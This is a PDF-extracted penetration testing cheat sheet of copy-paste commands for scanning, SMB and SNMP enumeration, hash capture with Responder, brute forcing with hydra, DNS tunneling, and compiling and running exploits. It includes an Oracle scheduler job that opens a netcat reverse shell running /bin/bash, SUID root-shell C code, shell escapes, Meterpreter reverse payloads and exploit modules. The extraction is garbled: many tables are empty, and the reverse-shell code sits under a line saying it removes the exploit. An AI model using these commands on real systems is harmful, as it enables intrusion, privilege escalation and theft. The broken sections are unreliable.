Pen Testing Tools Cheat Sheet
Pen Testing Tools Cheat Sheet
Pen Testing Tools Cheat Sheet
highon.coffee/blog/penetration-testing-tools-cheat-sheet
Introduction
Penetration testing tools cheat sheet, a quick reference high level overview for typical
penetration testing engagements. Designed as a quick reference cheat sheet providing a
high level overview of the typical commands used during a penetration testing engagement.
For more in depth information I’d recommend the man file for the tool, or a more specific pen
testing cheat sheet from the menu on the right.
The focus of this cheat sheet is infrastructure / network penetration testing, web application
penetration testing is not covered here apart from a few SQLMap commands at the end and
some web server enumeration. For Web Application Penetration Testing, check out the Web
Application Hackers Hand Book, it is excellent for both learning and reference.
If I’m missing any pen testing tools here give me a nudge on twitter.
Changelog
16/09/2020 - fixed some formatting issues. 17/02/2017 - Article updated, added loads more
content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.
Introduction
Changelog
Vulnerability Assessment
BOF / Exploit
Simple Local Web Servers
Mounting File Shares
HTTP / HTTPS Webserver Enumeration
Packet Inspection
Passwords
Wordlists
Windows Penetration Testing Commands
Linux Penetration Testing Commands
Reverse Shells
Meterpreter Cheat Sheet
ASCII Table Cheat Sheet
CISCO IOS Commands
SQLMap Examples
Pre-engagement
1/39
Network Configuration
Set IP Address
Subnetting
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
OSINT
DNS
WHOIS enumeration
whois domain-name-here.com
Command Description
nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer
Email
Simply Email
2/39
Use Simply Email to enumerate all the online places (github, target site etc), it works better if
you use proxies or set long throttle times so google doesn’t think you’re a robot and make
you fill out a Captcha.
Simply Email can verify the discovered email addresss after gathering.
Command Description
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>
DNS Bruteforce
DNSRecon
DNS Enumeration Kali - DNSRecon
Port Scanning
Nmap Commands
For more commands, see the Nmap cheat sheet (link in the menu on the right).
3/39
Command Description
nmap -v -sS -A -T4 target Nmap verbose scan, runs syn stealth, T4 timing (should
be ok on LAN), OS and service version info, traceroute
and scripts against services
nmap -v -sS -p--A -T4 As above but scans all TCP ports (takes a lot longer)
target
nmap -v -sU -sS -p- -A - As above but scans all TCP ports and UDP scan (takes
T4 target even longer)
I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4
commands on external pen tests (when using an Internet connection), you’re probably better
off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an
internal pen test, over low latency links with plenty of bandwidth. But it all depends on the
target devices, embeded devices are going to struggle if you T4 / T5 them and give
inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan
for the top 1000 so you can start pen testing then kick off a slower scan.
./udp-protocol-scanner.pl -f ip.txt
4/39
Other methods of host discovery, that don’t use nmap…
Command Description
netdiscover -r Discovers IP, MAC Address and MAC vendor on the subnet from ARP,
192.168.1.0/24 helpful for confirming you're on the right VLAN at $client site
Samba Enumeration
SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Command Description
smbclient -L //192.168.1.100
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
5/39
RID Cycling:
use auxiliary/scanner/smb/smb_lookupsid
Linux:
smbclient -L //192.168.99.131
NBTScan unixwiz
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
You’ll end up with NTLMv2 hash, use john or hashcat to crack it.
Responder.py
6/39
Run Responder.py for the length of the engagement while you're working on other attack
vectors.
Command Description
snmpcheck -t 192.168.1.X -c public SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f
snmpenum -t 192.168.1.X
Rory McCune’s snmpwalk wrapper script helps automate the username enumeration
process for SNMPv3:
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
R Services Enumeration
nmap -A will perform all the rservices enumeration listed below, this section has been added
for completeness or manual confirmation:
7/39
RSH Enumeration
RSH Run Commands
auxiliary/scanner/rservices/rsh_login
Finger Enumeration
finger @TARGET-IP
finger batman@TARGET-IP
finger 0@host
rwho
testssl.sh
Test all the things on a single host and output to a .html file:
Vulnerability Assessment
8/39
Install OpenVAS 8 on Kali Rolling:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
netstat -tulpn
Oracle
Install oscanner:
Run oscanner:
Install tnscmd10g:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
9/39
Requirements:
In the example below the user SCOTT is used but this should be possible with another
default Oracle account.
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Login using the identified weak account (assuming you find one).
You should have a DBA user with creds user1 and pass1.
Verify you have DBA privileges by re-running the first command again.
10/39
Remove the exploit using:
begin
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
MSSQL
Enumeration / Discovery:
Nmap:
Metasploit:
Network
Plink.exe Tunnel
PuTTY Link tunnel
11/39
Pivoting
SSH Pivoting
Meterpreter Pivoting
Windows 128
Linux 64
Solaris 255
Classful IP Ranges
12/39
Class IP Address Range
Class Range
127.0.0.0 - 127.255.255.255
Subnet cheat sheet, not really realted to pen testing but a useful reference.
13/39
CIDR Decimal Mask Number of Hosts
14/39
CIDR Decimal Mask Number of Hosts
VLAN Hopping
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.
IKEForce
Install:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
15/39
3. Use ike-scan to capture the PSK hash from the IKE endpoint
4. Use psk-crack to crack the hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --
charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-
207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
DNS Tunneling
Tunneling data over DNS to bypass firewalls.
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to
and from the target machine.
Attacking Machine
Installtion:
16/39
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-
powershell/
BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
Command Description
searchsploit windows 2003 | Search exploit-db for exploit, in this example
grep -i local windows 2003 + local esc
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
17/39
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe
http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Exploiting Shellshock
nc -l -p 443
Command Description
18/39
Command Description
Command Description
apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing
SMB shares
Command Description
19/39
Command Description
nikto -h 192.168.1.1 Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn't work most of the time
Packet Inspection
Command Description
tcpdump tcp port 80 -w tcpdump for port 80 on interface eth0, outputs to
output.pcap -i eth0 output.pcap
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
Command Description
python /usr/share/doc/python-impacket- Enumerate users from SMB
doc/examples
/samrdump.py 192.168.XXX.XXX
Command Description
snmpwalk public -v1 192.168.X.XXX 1 Enmerate users from SNMP
|grep 77.1.2.25
|cut -d” “ -f4
20/39
Command Description
nmap -sT -p 161 192.168.X.XXX/254 -oG Search for SNMP servers with nmap,
snmp_results.txt grepable output
(then grep)
Passwords
Wordlists
Command Description
/usr/share/wordlists Kali word lists
Command Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f Hydra FTP brute force
192.168.X.XXX ftp -V
Command Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f Hydra POP3 brute force
192.168.X.XXX pop3 -V
Command Description
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX Hydra SMTP brute
smtp -V force
21/39
Password Cracking
Password cracking penetration testing tools.
Command Description
john --wordlist=/usr/share/wordlists/rockyou.txt JTR password cracking
hashes
Compiling Exploits
Some notes on compiling exploits.
Command Description
process.h, string.h, winbase.h, windows.h, winsock2.h Windows exploit code
22/39
Compile exploit gcc.
Command Description
gcc -o exploit exploit.c Basic GCC compile
Command Description
gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux
Command Description
i586-mingw32msvc-gcc exploit.c -lws2_32 -o Compile windows .exe on
exploit.exe Linux
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the
UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
23/39
Building the SUID Shell binary
For 32 bit:
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands
like su from reverse shells.
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
exec "/bin/sh"
os.execute('/bin/sh')
:!bash
24/39
!sh
Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting
techniques.
Meterpreter Payloads
Command Description
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload
Command Description
set payload windows/vncinject/reverse_tcp Meterpreter Windows VNC Payload
set ViewOnly false
Command Description
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload
Command Description
upload file c:\\windows Meterpreter upload file to Windows target
25/39
Command Description
portfwd add –l 3389 –p 3389 – Meterpreter create port forward to target machine
r target
Command Description
use MS08_067 Windows 2k, XP, 2003 Remote
exploit/windows/smb/ms08_067_netapi Exploit
26/39
Command Description
Command Description
use Bypass UAC on Windows 7 + Set target + arch,
exploit/windows/local/bypassuac x86/64
Command Description
Command Description
use exploit/multi/script/web_delivery Metasploit powershell payload
delivery module
27/39
Command Description
Command Description
run post/windows/gather/win_privs Metasploit show privileges of current
user
ASCII Character
28/39
ASCII Character
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x22 "
x23 #
x24 $
x25 %
x26 &
x27 `
x28 (
x29 )
x2a *
x2b +
29/39
ASCII Character
x2c ,
x2d -
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
30/39
ASCII Character
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
31/39
ASCII Character
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
32/39
ASCII Character
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
33/39
ASCII Character
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z
Command Description
enable Enters enable mode
34/39
Command Description
35/39
Command Description
Cryptography
Hash Lengths
Hash Size
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
Hash Example
36/39
Hash Example
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SQLMap Examples
A mini SQLMap cheat sheet:
Command Description
sqlmap -u http://meh.com --forms -- Automated sqlmap scan
batch --crawl=10
--cookie=jsessionid=54321 --level=5 -
-risk=3
37/39
Command Description
cheat-sheet Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC,
JSP, Java, Perl
Web App Insecure Direct Object Reference (IDOR): Definition, Examples &
Security How to Find
38/39
Category Post Name
39/39